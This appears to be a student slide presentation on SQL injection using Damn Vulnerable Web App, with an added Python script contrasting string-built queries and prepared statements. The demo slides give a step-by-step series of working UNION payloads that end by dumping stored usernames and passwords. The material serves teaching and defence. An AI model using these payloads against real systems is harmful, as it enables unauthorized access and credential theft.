SQL Injection By Wenonah Abadilla.

Topics
What is SQL
What is SQL Injection
Damn Vulnerable Web App
SQLI Demo
Prepared Statements

What is SQL?
Structured Query Language
The way you communicate with the database
Used to access and manipulate databases
COSC 341 at IUP

What is SQL Injection?
One of the most serious threats to web applications
Injects SQL commands into an SQL statement via web page input
Alters an SQL statement and compromises the security of the web application
Common in PHP and ASP applications due to the prevalence of older functional interfaces
Occurs when data enters a program from an untrusted source and that data is used to dynamically construct a SQL query
SQL injection harvesting: SQL statements crafted to render sensitive data

Types of SQLI
Error Based: causes an error and gathers information from the error message
Union Based: combines two or more SQL statements into one result
Blind: asks the database a true or false question

Consequences of SQL Injection
Confidentiality
Authentication
Authorization
Integrity

Damn Vulnerable Web App Demo
PHP/MySQL web application
An aid for security professionals to test their skills and tools in a legal environment
Helps developers better understand the process of securing web applications

// $id is taken directly from user input and pasted into the SQL text (the vulnerable pattern)
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";

Basic Injection
The web page is supposed to print the ID, first name, and surname
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '1'";

Always True Scenario
Asks the database to display all records that are false and all records that are true
%' : probably not equal to anything, so it will be false
'0'='0' : always true, because 0 will always equal 0
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0'";

Display Database Version
Notice the last displayed line: this is the version of the MySQL database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, version() #";

Display Database User
Notice the last displayed line: the name of the database user that executed the behind-the-scenes PHP code
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, user() #";

Display Database Name
Notice the last displayed line: this is the name of the database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, database() #";

Display All Tables in the information_schema
Displays all the tables in the information_schema database
INFORMATION_SCHEMA is the informational database: it stores information about all other databases that the MySQL server maintains
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, table_name from information_schema.tables #";

Display All User Tables in the information_schema
Displays all tables whose names start with the prefix "user" in the information_schema database
Quicker than looking through the previous output and searching manually for the user table
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' or 0=0 union select null, table_name from information_schema.tables where table_name like 'user%' #";

Display All Column Fields in the users Table
Displays all the columns in the users table
Notice the user_id, first_name, last_name, user and password columns
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #";

Display Column Field Contents in the users Table
Successfully displays all the authentication information held in the database
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #";

Prepared Statements and Bound Parameters
The query and the data are sent to the SQL server separately
Also called parameterized statements or parameterized SQL
A template for SQL statements: values are plugged into the query after the query is "prepared" and ready to be executed
Bound parameters (?): placeholders where the actual values are plugged in

Examples
PHP using PDO
Java using JDBC
The prepared statement sets "?" to the actual value stored in the id variable
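As an added example that is not part of the presentation, the following Python script uses the standard library's sqlite3 module in place of DVWA's PHP/MySQL setup to show why the string-built $getid query of the demo slides fails and a prepared statement with a bound "?" parameter does not. The users table and its rows are constructed for this example; the two payloads are the always-true and union ones from the slides, with SQLite's "--" comment marker standing in for MySQL's "#" and sqlite_version() standing in for version().

```python
import sqlite3

# Constructed sample rows modelled on the column names the slides list for the
# DVWA users table (user_id, first_name, last_name, user, password). All values
# here are made up for this example.
SAMPLE_USERS = [
    (1, "Ada", "Lovelace", "ada", "PLACEHOLDER_HASH_1"),
    (2, "Alan", "Turing", "alan", "PLACEHOLDER_HASH_2"),
    (3, "Grace", "Hopper", "grace", "PLACEHOLDER_HASH_3"),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, "
        "last_name TEXT, user TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """The slides' pattern: the untrusted id is pasted straight into the SQL
    text, so whatever the input contains becomes part of the statement."""
    getid = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return conn.execute(getid).fetchall()


def lookup_prepared(conn, user_id):
    """Prepared statement: the query template is fixed and the id is bound to
    the '?' placeholder, so the database only ever sees it as a literal value."""
    getid = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(getid, (user_id,)).fetchall()


def demo():
    """Run a normal id and the two slide payloads through both lookups."""
    conn = make_db()
    # Always-true payload from the slides: '%' or '0'='0'
    always_true = "%' or '0'='0"
    # Union-based version payload from the slides, adapted to SQLite's comment
    # syntax ('--') and version function (sqlite_version()).
    union_version = "%' or 0=0 union select null, sqlite_version() --"
    results = {
        "normal_vulnerable": lookup_vulnerable(conn, "1"),
        "normal_prepared": lookup_prepared(conn, "1"),
        "always_true_vulnerable": lookup_vulnerable(conn, always_true),
        "always_true_prepared": lookup_prepared(conn, always_true),
        "union_vulnerable": lookup_vulnerable(conn, union_version),
        "union_prepared": lookup_prepared(conn, union_version),
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

With the string-built query the always-true payload returns every row and the union payload adds a row carrying the database version, exactly as the demo slides show; with the bound parameter both payloads are compared to user_id as plain text and match nothing, because the statement's structure was fixed before the value arrived.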

Conclusion
SQLI is a huge threat to web applications
Use prepared SQL statements
Download Damn Vulnerable Web App
Questions?

Reference Page
"Coding Dynamic SQL Statements." Oracle Docs. Oracle, n.d. Web. 18 Feb. 2015. <http://docs.oracle.com/cd/B10500_01/appdev.920/a96590/adg09dyn.htm>.
"Damn Vulnerable Web App (DVWA): Lesson 6." Computer Security Student. N.p., n.d. Web. 17 Feb. 2015. <http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson6/>.
"PHP Prepared Statements." W3Schools. N.p., n.d. Web. 18 Feb. 2015. <http://www.w3schools.com/php/php_mysql_prepared_statements.asp>.
"SQL Injection." OWASP. N.p., 14 Aug. 2014. Web. 19 Feb. 2015. <https://www.owasp.org/index.php/SQL_Injection>.
"SQL Injection." W3Schools. N.p., n.d. Web. 15 Feb. 2015. <http://www.w3schools.com/sql/sql_injection.asp>.